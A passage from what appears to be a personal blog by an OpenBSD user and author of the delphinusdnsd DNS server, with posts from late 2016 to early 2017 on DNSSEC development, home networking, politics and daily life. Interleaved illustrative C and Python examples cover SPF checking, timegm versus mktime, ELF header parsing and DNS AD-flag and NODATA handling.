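	if (inet_pton(af, tmp, net) != 1)
		return 0;
	return prefix_eq(net, client, (int)bits);
}

/* Evaluate the record for one connecting IP; the first match wins. */
enum spf_result spf_check_ip(const char *record, const char *client_ip)
{
	unsigned char client[16];
	char copy[512], *tok, *save;
	int af;

	if (inet_pton(AF_INET, client_ip, client) == 1)
		af = AF_INET;
	else if (inet_pton(AF_INET6, client_ip, client) == 1)
		af = AF_INET6;
	else
		return SPF_NONE;
	if (strlen(record) >= sizeof(copy) || strncmp(record, "v=spf1", 6) != 0)
		return SPF_NONE;
	strcpy(copy, record);
	for (tok = strtok_r(copy, " ", &save); tok != NULL;
	    tok = strtok_r(NULL, " ", &save)) {
		if (af == AF_INET && strncmp(tok, "ip4:", 4) == 0 &&
		    mech_matches(AF_INET, tok + 4, client))
			return SPF_PASS;
		if (af == AF_INET6 && strncmp(tok, "ip6:", 4) == 0 &&
		    mech_matches(AF_INET6, tok + 4, client))
			return SPF_PASS;
		if (strcmp(tok, "-all") == 0)
			return SPF_FAIL;      /* receiver should reject */
		if (strcmp(tok, "~all") == 0)
			return SPF_SOFTFAIL;  /* receiver accepts but marks */
	}
	return SPF_NEUTRAL;                   /* nothing matched, no "all" */
}

int main(void)
{
	/* 203.0.113.7 is a documentation address standing in for a spoofer. */
	printf("78.47.14.22 -> %d\n", spf_check_ip(SAMPLE_SPF, "78.47.14.22"));
	printf("203.0.113.7 -> %d\n", spf_check_ip(SAMPLE_SPF, "203.0.113.7"));
	return 0;
}
```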



FreeBSD Donation

September 30th, 2016

I have donated $5 to FreeBSD Foundation. This wraps up FreeBSD donations for this year, there is an OpenBSD donation coming in 2 months or so.



I've turned on the heat for 2016/2017

October 4th, 2016

The temperature right now is 13 Celsius and it's expected to drop more, so I'm turning on the heat. I read somewhere that in Germany by law the O-O rule stands. O-O stands for Oktober-Ostern so October till Easter, that is when the heat is expected to be turned on by landlords. Since I control my own heat I am independent of this, but I pay for my own heat as well.



I got credited to a bug report

October 4th, 2016

OpenBSD fixed a bug in OpenBSD-current and it also existed in 5.9 and 6.0. Here is the credit, and it got fixed today. This is under the "ARP bug" in my panic chronicles. Which I'll remove now.



Good News

October 6th, 2016

I have fixed a thing that stalled development on my DNS server. In particular the dd-convert.c program was using mktime() erroneously, the fix was to put timegm() in those places. Here is the fix at version 1.19 where this occurred. Much thanks to Habbie who helped me in August of this year to get me back on track. I can now continue programming on dd-convert.c when I have time. I'm looking forward to my winter vacation. Perhaps I'll even finish dd-convert.c then. And New Year 2017 would be around the time to cut a release. Wouldn't it be great to be on time. Oh well.
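Why swapping mktime() for timegm() matters, as an added example that is not code from dd-convert.c: it assumes the values being converted are UTC timestamps in the YYYYMMDDHHMMSS form that DNSSEC signatures use, and converts the same string both ways under a Central European time zone. The function names and sample timestamps are made up for this illustration.

```c
#define _DEFAULT_SOURCE   /* exposes timegm() and setenv() on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Parse "YYYYMMDDHHMMSS" into a broken-down time. Returns 0 on success. */
static int parse_stamp(const char *s, struct tm *tm)
{
	int y, mo, d, h, mi, sec;

	if (strlen(s) != 14 ||
	    sscanf(s, "%4d%2d%2d%2d%2d%2d", &y, &mo, &d, &h, &mi, &sec) != 6)
		return -1;
	memset(tm, 0, sizeof(*tm));
	tm->tm_year = y - 1900;
	tm->tm_mon = mo - 1;
	tm->tm_mday = d;
	tm->tm_hour = h;
	tm->tm_min = mi;
	tm->tm_sec = sec;
	tm->tm_isdst = -1;   /* let mktime() decide; timegm() ignores it */
	return 0;
}

/* Treats the fields as local time, so the result depends on TZ. */
time_t stamp_to_epoch_mktime(const char *s)
{
	struct tm tm;

	if (parse_stamp(s, &tm) != 0)
		return (time_t)-1;
	return mktime(&tm);
}

/* Treats the fields as UTC, independent of TZ. */
time_t stamp_to_epoch_timegm(const char *s)
{
	struct tm tm;

	if (parse_stamp(s, &tm) != 0)
		return (time_t)-1;
	return timegm(&tm);
}

/* Switch the process time zone; a POSIX rule string needs no zoneinfo files. */
void use_zone(const char *tz)
{
	setenv("TZ", tz, 1);
	tzset();
}

int main(void)
{
	const char *stamp = "20161006000000";   /* constructed sample value */

	use_zone("CET-1CEST,M3.5.0,M10.5.0/3");  /* Central European time */
	printf("timegm: %lld\n", (long long)stamp_to_epoch_timegm(stamp));
	printf("mktime: %lld\n", (long long)stamp_to_epoch_mktime(stamp));
	printf("shift:  %lld seconds\n",
	    (long long)(stamp_to_epoch_timegm(stamp) -
	    stamp_to_epoch_mktime(stamp)));
	return 0;
}
```

On a machine whose TZ is UTC both functions agree, which is how this kind of bug stays hidden until the code runs somewhere else.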



Usutu Virus killing Blackbirds

October 8th, 2016

I heard the Usutu Virus is responsible for killing large populations of blackbirds predominantly. I wrote about this in October 2011, seems there is a second large wave coming through now. First read about this in Spiegel Online (German). The blackbirds are victims this year of not only this virus but trees have lesser food such as berries I noticed, due to the summer heat.



My core network

October 11th, 2016

I was asked by AVM support to make a drawing of my network, I was having so much fun with xfig that I want to share it with you.

Parts of it are in the German language but it's self explanatory.



Upgraded io.solarscale.de to OpenBSD 6.0

October 13th, 2016

I have upgraded my last FreeBSD VPS to OpenBSD. It wasn't easy but I managed to overwrite the first 64 MB of the partition table with OpenBSD installer. Then I did a network install. Which didn't work for some reason, so I had to ftp the packages manually before doing a disk install. OpenBSD rocks! I now have 3 OpenBSD vps's. I don't think I need any more, I'm quite happy with this.



Ordered 4 Puffy Mugs

October 13th, 2016

I have ordered four puffy mugs from the OpenBSDStore. I'm glad to be inviting my 3 friends to have tea or coffee with them. Puffy style.



An idea and a plea for our world's society

October 16th, 2016

Currently we're living in a split-brained world. On one side there are powerful corporations who build shabby products, on the other side there are consumers who require quality products that have no government issued backdoors in them.

If we really are in an "information" age then why are computers a secret? Why do our children not get taught anything useful in school, to build their own computer for example? We're teaching the kids nonsense and not telling them the truth on what is needed in a true information age!

Now if you think children at age 12 should sit down with a soldering iron and construct circuits you're both right and wrong at the same time. We know that electric circuits can produce a logic gate in order to do the magic that runs computers. We also know from research that photonic circuits can in theory do the same without the heat byproduct.

We also know that silicon can be doped to produce lasers. My suggestion is to produce computers with photonic gates or fibre optic switches as components.

Put away with slow speed busses and combine RAM with CPU on one silicon circuit. And interface this "package" with high speed optical paths to other CPU's and I/O such as USB busses. There is very minimal soldering that needs to be done in that scenario, but kids should learn to work with these high tech components.

I am willing to bet a homebrew computer that uses light to switch its I/O is 100 times faster than the usual 8 bit homebrews that we have. That's an amazing 200 MHz! We should teach our kids to build these from scratch giving them the components only so that they can make their own.

I'm of the opinion that children from age 10 to age 14 should be taught how to build their own computers and from age 14 through 18 use these tools to expand their knowledge in other fields. Everyone their own computer! That should be a must in the information age.

If you really think about this you may come to the same conclusion as me that people growing up around this idea will become craftsmen from slaves and will know how to build their own computers that are top notch technology. Combined this is Open Source and Open Hardware and will tell the silicon industry who possibly covet in secrecy to play fair. Their day has possibly come.



Autumns Dress

October 18th, 2016



Got 4 Puffy Mugs today

October 18th, 2016



Delphinusdnsd name approaches 2 years old

October 20th, 2016

On November 14th, 2014 I forked delphinusdnsd from wildcarddnsd. It was a namechange to indicate a new direction in programming, namely DNSSEC. I'd like to sum up the milestones it got since then:

  • dd-convert.rb a ruby script to sign zonefiles
  • a semi decent working dnssec stack

Currently and this year I'm working on a replacement for dd-convert.rb to make the project full C source again. And I'm getting ideas to incorporate parts of dd-convert.c back into delphinusdnsd to help in things such as dynamic DNS that is fully signed. But first I gotta get this done. It's my main task for this year which had obstacles to overcome. I'm looking forward to 2017 to start new things on delphinusdnsd and improve on it, here are some hints:

  • underlying database needs to be replaced, that means goodbye berkeley db. The reason for this is that there is a bug with my implementation, not sure if it's OpenBSD related or Berkeley DB related but it appears to affect queries.

And then there is always the need to refactor some code.



Will Internet Surveillance in Germany decelerate our Internet?

October 21st, 2016

Germany is already behind many other countries in Europe and elsewhere (like South Korea), in terms of Internet speeds. Recently the BND was given powers (German) to surveil our Internet. I'm wondering if the surveillance will decelerate our Internet from progressing into something fit for the 21st century. South Korea is working on 10 Gbit/s speeds for everyone already. We're just at 50 Mbit/s if we're lucky. I still have 16 Mbit/s. With every speed upgrade at an ISP the BND will have to conform their spy equipment to similar standards which is a burden on the taxpayer. I fear Pandora's box has been opened.



Happy Hallowe'en!

October 31st, 2016

I got candies here! And awaiting children if any dare!



Shades can say so much!

October 31st, 2016

Made this photo a few days ago. I think it's very pretty.

Made with an iPod as I was walking down this path. Happy Autumn!



First day of Snow for the Season

November 8th, 2016

Yesterday I increased the heat to #2 on my electric "nachtspeicher" furnaces. Tonight it's snowing. Stille Nacht.



Arctic Fibre acquired by Quintillion Networks

November 8th, 2016

Today is the first day of snow I experienced in the 2016 fall season. In 2013 I experienced the same first few days of snow in Iqaluit, Nunavut. Because I saw a connection I researched the past and found in a link that Arctic Fibre of Toronto, Canada was acquired by Quintillion Networks last June. Quintillion Networks seems to be run by people from Alaska. It reminded me how my friend in Iqaluit said that Barrow, Alaska has a lot in common with Iqaluit (I think he said that on twitter). Anyhow the Canadian part joining with the Alaskan part and stretching to the UK is probably in limbo since it's been pushed back to Phase 3. But here is hoping that Iqaluit will get terrestrial submersed fibre optic cable some day.



Donald Trump is president of the US-elect

November 9th, 2016

I did not cheer for Hillary and I did not cheer for Trump. Americans failed to look for the alternatives. My favourite was Jill Stein, who got very few votes if any. I did not cheer for the "lesser evil", I turned my thoughts away from the Clinton-Trump pair, even though people tried to tell me I had to choose. I don't have to choose, I chose the alternative. Hopefully the Donald will not wreck too much in relations between my country and the USA. I count on the real alternative, the US Green Party.



Government (NASA) Space Program likely to suffer under Trump

November 9th, 2016

I talked a little about the American and European space programs in the past. Now on one hand it was a GOP under Dubya Bush who wanted Moon to Mars. However Trump has other priorities. He wants to fix the potholes in America first. He makes economic sense, there is no glory when your infrastructure is failing. But we likely won't see much action until at least 2021, that's after his first term is my thought. With Obama the American Space Program suffered but Obama set something in motion that was perhaps a smart move. The private space industry, SpaceX, Boeing, those sorts of private enterprises.



A real exciting Idea

November 10th, 2016

Yesterday I was brainstorming how to "sign" binaries in OpenBSD, and I caught an itch. I don't know if I'll ever do this but I've given it thoughts since yesterday. First though I want to show you this, here. I'm not the only person that thinks a signed binary in OpenBSD would be a good idea. So then I thought about how to do this a little.

In the kernel the exec routines for reading an ELF binary would have to be modified in the following way. It reads the ELF program header table and expects a PT_OPENBSD_ELFSEC program header identification. By reading in the entire binary upon exec, given that the user is not root (a suser check) and caching shows no binary being checked before (a walk of a LIST), the kernel HMAC checksums the binary with a key that was ioctl'ed into the kernel at boottime under securelevel 0, in fact this check is only done if the securelevel is > 0. It then compares the section of PT_OPENBSD_ELFSEC and if it matches it discards the read file, and lets read-on-demand take over for the file. It is running a genuinely "signed" binary.

In userland there are 4 programs that get modified. Binutils, strip, elfsec and elfsecd. When compiling new programs the PT_OPENBSD_ELFSEC program header gets added to the ELF program headers. As root you can execute any signed binary because then it doesn't matter if signed or not, a hacker has all control over the system. When binaries are compiled make calls strip with a new argument which will "bless" a binary with the elfsec program when root. When a non-root user it is checked first if a user is allowed to bless binaries and then elfsec speaks with elfsecd to bless a binary with the private key that only root can read, a bunch of descriptor passing within the imsg framework would work out nicely. The elfsec binary should also be able to bless entire directories such as /bin, /sbin, /usr/bin, /usr/sbin etc.

This is the track I have wrapped my thoughts around. Dunno if it's worth it but the installer program would need to be modified to rebless new binaries in an upgrade. That would satisfy all those naysayers that say it would never work. In the end result you prevent someone else from importing binaries that you don't want running on your system. Perhaps a worm of sorts. It's another level of security and it would cost an attacker a lot of resources to crack the private key to each binary. It would slow down a system somewhat, but I've been using SSD's for a few years now and don't see this as much of an issue, also there is caching which should speed this up.

Hehe, thinking of vapourware can be mind consuming for sure :-).
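The first step of the kernel-side check described above, as an added example that is not OpenBSD code: finding the signature segment in the program header table of an ELF64 little-endian image while treating every header field as untrusted input. The segment type value, the function names and the in-memory sample are made up for this illustration, and the HMAC computation itself is not covered.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Made-up value standing in for the post's PT_OPENBSD_ELFSEC. */
#define PT_ELFSEC_DEMO 0x65a3dbf0u
#define EHDR64_SIZE 64   /* size of an ELF64 file header    */
#define PHDR64_SIZE 56   /* size of an ELF64 program header */

/* Little-endian read/write of n bytes, safe for unaligned input. */
static uint64_t rd(const unsigned char *p, int n)
{
	uint64_t v = 0;

	while (n-- > 0)
		v = (v << 8) | p[n];
	return v;
}

static void wr(unsigned char *p, int n, uint64_t v)
{
	int i;

	for (i = 0; i < n; i++)
		p[i] = (unsigned char)(v >> (8 * i));
}

/*
 * Find the segment of type `want`. Returns 0 and stores its file offset and
 * size, or -1 if it is absent or any header field points outside the image.
 */
int find_segment(const unsigned char *img, size_t len, uint32_t want,
    uint64_t *off, uint64_t *size)
{
	uint64_t phoff, entsize, phnum, i;

	/* magic, ELFCLASS64 (2), ELFDATA2LSB (1) */
	if (len < EHDR64_SIZE || memcmp(img, "\177ELF", 4) != 0 ||
	    img[4] != 2 || img[5] != 1)
		return -1;
	phoff = rd(img + 0x20, 8);    /* e_phoff     */
	entsize = rd(img + 0x36, 2);  /* e_phentsize */
	phnum = rd(img + 0x38, 2);    /* e_phnum     */
	/* the whole table must lie inside the file; written to avoid overflow */
	if (entsize != PHDR64_SIZE || phoff > len ||
	    phnum * entsize > len - phoff)
		return -1;
	for (i = 0; i < phnum; i++) {
		const unsigned char *ph = img + phoff + i * entsize;
		uint64_t p_off = rd(ph + 8, 8), p_filesz = rd(ph + 32, 8);

		if (rd(ph, 4) != want)
			continue;
		/* a segment that claims bytes past end of file is rejected */
		if (p_off > len || p_filesz > len - p_off)
			return -1;
		*off = p_off;
		*size = p_filesz;
		return 0;
	}
	return -1;
}

/* Constructed sample: file header, two program headers, a 32-byte blob. */
size_t build_sample(unsigned char *buf, size_t cap, uint64_t claimed_size)
{
	size_t blob = EHDR64_SIZE + 2 * PHDR64_SIZE, total = blob + 32;
	unsigned char *ph = buf + EHDR64_SIZE + PHDR64_SIZE;

	if (cap < total)
		return 0;
	memset(buf, 0, total);
	memcpy(buf, "\177ELF", 4);
	buf[4] = 2; buf[5] = 1; buf[6] = 1;
	wr(buf + 0x20, 8, EHDR64_SIZE);
	wr(buf + 0x36, 2, PHDR64_SIZE);
	wr(buf + 0x38, 2, 2);
	wr(buf + EHDR64_SIZE, 4, 1);       /* header 0: PT_LOAD       */
	wr(ph, 4, PT_ELFSEC_DEMO);         /* header 1: signature tag */
	wr(ph + 8, 8, blob);
	wr(ph + 32, 8, claimed_size);
	return total;
}

int main(void)
{
	unsigned char img[256];
	uint64_t off, size;
	size_t len = build_sample(img, sizeof(img), 32);

	if (find_segment(img, len, PT_ELFSEC_DEMO, &off, &size) == 0)
		printf("signature segment at %llu, %llu bytes\n",
		    (unsigned long long)off, (unsigned long long)size);
	return 0;
}
```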



OpenBSD Donation Time

November 19th, 2016

Part 2/2 of this year, I have donated 100 EUR to Theo de Raadt. This wraps up my donations to all *BSD's this year. BTW the donation meter at OpenBSD foundation is almost filled to the goal. Congrats OpenBSD!



The Hydrogen Economy

November 23rd, 2016

My dad thinks this is a real good concept. The Hydrogen Economy. Unfortunately we're not there yet, but rest assured our militaries' submarines have been using these for quite a while. Maybe in another lifetime will we civilians make use of this.



My OpenBSD bridge inside Freifunk Franken

November 23rd, 2016

Freifunk Franken is a network that is partitioned into what's called hoods. While the entire network consists of 10.50.0.0/16, my hood has 10.50.60.0/19 or something. I'm in the Hassberge Sued Hood which is centered around Hassfurt. Each hood represents a Layer 2 (Datalink layer) network, so you can reach within 1 IP Hop everything inside it. Since geographically my parents house and my apartment are in the same Hood, I set up an OpenBSD machine as a bastion host between my internal network and the freifunk franken network to do IPSEC tunneling in order to have security and integrity between my parents house and my house. The bastion host I set up at my parents house looks like this:

It is a PC-ENGINES APU router that does not have forwarding between its interfaces, hence there is no way to misroute things.

I've been running this for a few weeks now and have hooked up SIP phones to this. The phone conversations are clear as ever (38 ms ping). Knowing that they are encrypted is a big bonus.



Blueberries

November 29th, 2016

At my local supermarket I picked up a batch of blueberries. When I ate them I noticed a change in vision and a heightened awareness. This made me curious what I experienced. For one it enacted in my visual senses, so that must be the occipital lobe area of the brain. Reading online about this fruit I found that it is classed a "superfood", a nutrition bomb so to speak. It is high in Vitamin C and K and has manganese. It is good to have when you have nutritional deficiencies. It sure made a diff for me this afternoon. Also the Latin name of its genus, vaccinium, sounds like the English vaccine. Maybe there is a relation. I'm glad I experimented with this.



Our Mass-surveillance problem

December 1st, 2016

I just watched Edward Snowden on a clip on youtube during dinner and he made a great speech regarding that presidents can't fix the mass surveillance problem and that we must fix it (as a world movement). He said we must weigh the should we and shouldn't we or something, because lately it's been the can or can't we. This reminded me that the German BND (spy service) has been given 150 million EUR to spy on people's snapchat and other encrypted forms of communication. We have to work against the power structures that want to take our privacy and route around these.

BTW there is fake news possibly saying that Julian Assange has been kidnapped by CIA. Fake news can be so annoying because they could turn out to be real. Julian, I hope you're OK!



2016 Year in Review

December 8th, 2016

A bit earlier than most years here is the review for 2016.

December 8th, 2016	This year in review 2016.
December 1st, 2016	Our Mass-surveillance problem
November 29th, 2016	Blueberries
November 23rd, 2016	My OpenBSD bridge inside Freifunk Franken
November 23rd, 2016	The Hydrogen Economy
November 19th, 2016	OpenBSD Donation Time
November 10th, 2016	A real exciting Idea
November 9th, 2016	Government (NASA) Space Program likely to suffer under..
November 9th, 2016	Donald Trump is president of the US-elect
November 8th, 2016	Arctic Fibre acquired by Quintillion Networks
November 8th, 2016	First day of Snow for the Season
October 31st, 2016	Shades can say so much!
October 31st, 2016	Happy Hallowe'en!
October 21st, 2016	Will Internet Surveillance in Germany decelerate our..
October 20th, 2016	Delphinusdnsd name approaches 2 years old
October 18th, 2016	Got 4 Puffy Mugs today
October 18th, 2016	Autumns Dress
October 16th, 2016	An idea and a plea for our world's society
October 13th, 2016	Ordered 4 Puffy Mugs
October 13th, 2016	Upgraded io.solarscale.de to OpenBSD 6.0
October 11th, 2016	My core network
October 8th, 2016	Usutu Virus killing Blackbirds
October 6th, 2016	Good News
October 4th, 2016	I got credited to a bug report
October 4th, 2016	I've turned on the heat for 2016/2017
September 30th, 2016	FreeBSD Donation
September 30th, 2016	Victim of spoofed Mail
September 27th, 2016	My IPv6 setup at M-net (german provider)
September 20th, 2016	Ordered a book from Amazon
September 20th, 2016	Equinox in two days
September 14th, 2016	Stand up for Snowden
September 14th, 2016	TLS for centroid.eu blog, when?
September 9th, 2016	One more panic chronicle entry
August 30th, 2016	I had photographed Vega and Constellation Hercules
August 30th, 2016	The whereabouts of HD164595 in Hercules
August 24th, 2016	OpenBSD 6.0 Poster arrived
August 22nd, 2016	Ordered a Banana Pi R1 Routerboard and Case
August 22nd, 2016	Delphinusdnsd: Next week selfathon
August 19th, 2016	Eleven Reasons to be excited about the future of Tech..
August 19th, 2016	The Panic Chronicles
August 16th, 2016	My all-prime angled triangles
August 15th, 2016	less surveillance
August 9th, 2016	New self-portrait of me
August 5th, 2016	Psychosis: put to the test (my first psychosis)
August 5th, 2016	DSL: a question I've always wondered
August 5th, 2016	O Really?  Do we really need NATO?
August 5th, 2016	Ordered 4 books
August 2nd, 2016	If I were to vote in the US Election today
July 30th, 2016		Freifunk Project fail
July 24th, 2016		Did you know: DoS report law
July 23rd, 2016		Finally quit Twitter
July 23rd, 2016		Media blackout of SZ.de yesterday
July 22nd, 2016		Quitting Twitter tomorrow at noon
July 22nd, 2016		The WTC conspiracy
July 19th, 2016		Sick of it
July 18th, 2016		My Stargate
July 15th, 2016		Ordered two books
July 13th, 2016		It's not me
July 5th, 2016		EU could be un-democratic
July 4th, 2016		Being Freifunk Active
July 2nd, 2016		The missing link
June 29th, 2016		Changs at $HOME
June 26th, 2016		Ordered books from Amazon
June 25th, 2016		I hunt sysadmins
June 25th, 2016		EU, something must change
June 24th, 2016		Idea Brainstorming for Britain
June 24th, 2016		Goodbye Britannia
June 21st, 2016		Happy Summer!
June 20th, 2016		June Solstice in 3 days
June 18th, 2016		Received seven Freifunk Routers
June 12th, 2016		Most cannot see the milky way
June 10th, 2016		Energiewende in Danger
June 10th, 2016		Why I prefer BIND over unbound currently
June 4th, 2016		OpenBSD Donation Time
June 4th, 2016		Brexit, I'd like UK to stay
June 4th, 2016		Gotthard Base Tunnel
May 26th, 2016		Moved delphinusdnsd
May 21st, 2016		Turkeys government?  No go!
May 20th, 2016		Instead of Toronto, Ireland?
May 16th, 2016		5 days left for americas.centroid.eu
May 15th, 2016		Ordered books
May 12th, 2016		Donated $5 to ISC
May 12th, 2016		The need for a mesh network
May 12th, 2016		Stoererhaftung has been eliminated in Germany
May 10th, 2016		Europeans love English!
May 7th, 2016		One router too many?  The add-up.
May 7th, 2016		RPI Guest AP done, but not for 2.4 GHz
May 5th, 2016		Not passing down my RPI after all
May 3rd, 2016		My dreamworld
May 2nd, 2016		Blog's birthday
May 2nd, 2016		Considering an SSD upgrade
May 1st, 2016		13,500 positions in the German Cyber Army
April 22nd, 2016	Doing a training session this summer
April 15th, 2016	Stand down!  OK.
April 13th, 2016	12 months of Parship
April 7th, 2016		VDSL not until February 2017
April 7th, 2016		Registered a new domain
March 30th, 2016	I waited 3 years for this moment
March 28th, 2016	Ordered 100 Mbit Internet
March 27th, 2016	A rare word on politics
March 27th, 2016	Handing down my Raspberry Pi model B
March 27th, 2016	Very cool presentation by Agarwal
March 21st, 2016	Spring now...
March 19th, 2016	Making a turn-key dns server out of DelphinusDNSD
March 14th, 2016	Lordy Lordy loook who is Forty
March 6th, 2016		30 Years of Personal Computing History
March 6th, 2016		After 16 years, I got a TV
March 3rd, 2016		Ordered a backup Firewall
March 1st, 2016		New VDSL modem turned on
March 1st, 2016		19 days until March Equinox
February 24th, 2016	New Access Point in my apartment
February 24th, 2016	Venus broke
February 23rd, 2016	Registered domain zeropager.de
February 20th, 2016	Getting a TV after 16 years having none
February 18th, 2016	Apple is right (in this case)
February 12th, 2016	DSL Link issues, Provider refuses to help me...
February 8th, 2016	Delphinusdnsd what's next in development?
February 3rd, 2016	Ten days from now is Year Three
February 3rd, 2016	Electricity for 2015 way up
January 29th, 2016	Delphinusdnsd 1.0.1 released
January 23rd, 2016	All Domain Names signed
January 22nd, 2016	Delphinusdnsd - ironing out the DNSSEC bugs
January 21st, 2016	What's up down with the Canadian Dollar?
January 20th, 2016	Preparing to sign my zones -> DNSSEC
January 19th, 2016	To Human Artificial Systems
January 9th, 2016	Dissecting WebShoppy Mac OS X trojan
January 8th, 2016	Organized Crime is the Enemy
January 6th, 2016	Donation time
January 3rd, 2016	The invisible man
January 1st, 2016	How hard can changing a password be?
January 1st, 2016	When a book loses significance
January 1st, 2016	Delphinusdnsd 1.0.0 Released
December 31st, 2015	More power from Arabia and Sahara?
December 29th, 2015	Our XMAS Dinner
Enjoy the memories.



Solstice in three days

December 18th, 2016

The solstice will be here in three days. Happy solstice!



Merry Christmas

December 24th, 2016

May Santa be good to you.



Christmas Tree 2016

December 24th, 2016

Not really a tree, but this is how we've done it for the past decade or so.

Merry Christmas!



Hacking days

December 27th, 2016

I'm on vacation. I've decided to use most of my vacation days to hack on delphinusdnsd. If you're interested in progress I'd suppose you could look at this link. Thanks for well-wishes!



Happy New Year 2017

December 31st, 2016

As I write this, it's already been new years in Fiji, so the Earth is rotating in 2017 already. I had a very good year in 2016, and hoping 2017 will be good too. I wish the same for you.



Delphinusdnsd will be released January 29th

January 2nd, 2017

There is new news on the delphinusdnsd website. To quote:

"DelphinusDNSD 1.1.0 is in alpha-testing, the release date is fixed to 
around January 29, 2017. Contact me if you want to help. The changes are 
far from staggering, they are more about programmer freedom. I have replaced 
the Ruby program with a C program and rely less on an external program 
provided by BIND. So I escape licensing caveats and am in a much better 
position. Due to my limited time (so far a 1 person effort), I did not get 
TODO's in that I really want to see in, maybe for the 1.2.0 release, which 
would be in 2018 :-}."

I still invested a lot of time in this in 2016. But my resources are limited. Any (open source) programmer will tell you this... (time is not enough). But I guess it happens everywhere.



Goodbye Mac OS X port

January 3rd, 2017

I have decided to drop the Mac OS X port for delphinusdnsd. If anyone wants to pick this up all it really needs is a Makefile update. The reason I do this is because Mac OS X is a dying OS at my house. I only have 1 native Mac OS X computer left and I don't want to pollute it with Mac Ports. Also I'm against running delphinusdnsd on a computer that has an open microphone for Siri. Let the real operating systems survive.



BIND didn't reply with AD flag

January 5th, 2017

I made a configuration mistake in my BIND options. I had set dnssec-validation yes; but this was wrong. This is how it should look:

# grep dnssec named.conf
        dnssec-enable yes;
        dnssec-validation auto;

Only with auto set will the AD flag appear and validation be done. Thanks Google for helping me find the problem.
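One way to check the AD flag without dig, as an added example that is not part of the original post: it builds a query with the EDNS0 DO bit and reads the flags from the reply header. The function names and the sample headers are constructed for illustration; `ask()` is meant for a resolver you operate.

```python
import secrets
import socket
import struct

# Header flag bits: RFC 1035 section 4.1.1; AD is defined by RFC 4035.
QR, RD, RA, AD = 0x8000, 0x0100, 0x0080, 0x0020
TYPE_A, TYPE_OPT, CLASS_IN = 1, 41, 1
EDNS_DO = 0x8000        # "DNSSEC OK" bit in the OPT record's flags field
RCODE_SERVFAIL = 2


def encode_name(name):
    """Encode a domain name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError("bad label in %r" % name)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name, qtype=TYPE_A, qid=0x1234):
    """Recursive query carrying an EDNS0 OPT record with the DO bit set."""
    header = struct.pack("!HHHHHH", qid, RD, 1, 0, 0, 1)
    question = encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)
    # OPT RR: root name, type 41, class = UDP payload size,
    # TTL = extended RCODE, version, flags; empty RDATA.
    opt = b"\x00" + struct.pack("!HHBBHH", TYPE_OPT, 4096, 0, 0, EDNS_DO, 0)
    return header + question + opt


def parse_header(msg):
    """Decode the fixed 12-byte DNS header."""
    if len(msg) < 12:
        raise ValueError("truncated DNS header")
    qid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": qid, "response": bool(flags & QR), "ra": bool(flags & RA),
            "ad": bool(flags & AD), "rcode": flags & 0x000F, "answers": an}


def validation_status(msg, expected_id=None):
    """Classify a reply: 'validated' only when the resolver set AD."""
    h = parse_header(msg)
    if not h["response"] or (expected_id is not None and h["id"] != expected_id):
        raise ValueError("not the response to our query")
    if h["rcode"] == RCODE_SERVFAIL:
        # A validating resolver answers SERVFAIL when validation fails.
        return "servfail"
    return "validated" if h["ad"] else "not validated"


def ask(resolver_ip, name, timeout=3.0):
    """Send the query over UDP to a resolver you operate and classify the reply."""
    qid = secrets.randbelow(1 << 16)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, qid=qid), (resolver_ip, 53))
        reply, _ = s.recvfrom(4096)
    return validation_status(reply, expected_id=qid)


# Constructed 12-byte headers (not captured traffic): flags "qr rd ra ad"
# (0x81a0), "qr rd ra" (0x8180) and a SERVFAIL reply (0x8182).
SAMPLE_VALIDATED = struct.pack("!HHHHHH", 0x1234, 0x81A0, 1, 1, 0, 1)
SAMPLE_UNVALIDATED = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 1)
SAMPLE_SERVFAIL = struct.pack("!HHHHHH", 0x1234, 0x8182, 1, 0, 0, 1)

if __name__ == "__main__":
    for label, msg in (("with AD", SAMPLE_VALIDATED),
                       ("without AD", SAMPLE_UNVALIDATED),
                       ("SERVFAIL", SAMPLE_SERVFAIL)):
        print(label, "->", validation_status(msg))
```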



RFC 8020 violation of Delphinusdnsd

January 8th, 2017

When delphinusdnsd has a zone.tld domain name and that contains a _25._tcp.mail.zone.tld domain name then when someone looks up just _tcp.mail.zone.tld the daemon replies with an NXDOMAIN. This is wrong. It should reply with NODATA which is NOERROR with nothing in the data section. Needless to say I'm going to try to fix this before the 1.1.0 release.
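The lookup decision described above, as an added example that is not delphinusdnsd's code: a small in-memory zone that answers an empty non-terminal with NODATA, next to the owner-names-only behaviour that yields the wrong NXDOMAIN. The `Zone` class, the `ent_aware` switch and the zone data are constructed for illustration; wildcards, delegations and DNSSEC denial records are left out.

```python
def labels(name):
    """Lower-cased labels of a domain name, ignoring a trailing dot."""
    return tuple(part for part in name.lower().rstrip(".").split(".") if part)


class Zone:
    def __init__(self, origin, records):
        self.origin = labels(origin)
        self.rrsets = {}
        for owner, rrtype, rdata in records:
            by_type = self.rrsets.setdefault(labels(owner), {})
            by_type.setdefault(rrtype, []).append(rdata)
        # An empty non-terminal (ENT) owns no records itself but has a
        # descendant that does: every record-less ancestor between an
        # owner name and the zone apex.
        self.ents = set()
        for owner in self.rrsets:
            for cut in range(1, len(owner) - len(self.origin)):
                ancestor = owner[cut:]
                if ancestor not in self.rrsets:
                    self.ents.add(ancestor)

    def lookup(self, qname, qtype, ent_aware=True):
        """Return (rcode, answers); NODATA is ("NOERROR", [])."""
        name = labels(qname)
        if name[-len(self.origin):] != self.origin:
            return ("REFUSED", [])          # not our zone
        if name in self.rrsets:
            # Name exists; an absent type is NODATA, not NXDOMAIN.
            return ("NOERROR", list(self.rrsets[name].get(qtype, [])))
        if ent_aware and name in self.ents:
            # RFC 8020: NXDOMAIN means nothing exists at or below the name,
            # so a name with descendants must never get it.
            return ("NOERROR", [])
        return ("NXDOMAIN", [])


# Constructed zone data using the names from the post.
ZONE = Zone("zone.tld", [
    ("zone.tld", "SOA", "ns1.zone.tld. hostmaster.zone.tld. 1 3600 900 604800 300"),
    ("zone.tld", "NS", "ns1.zone.tld."),
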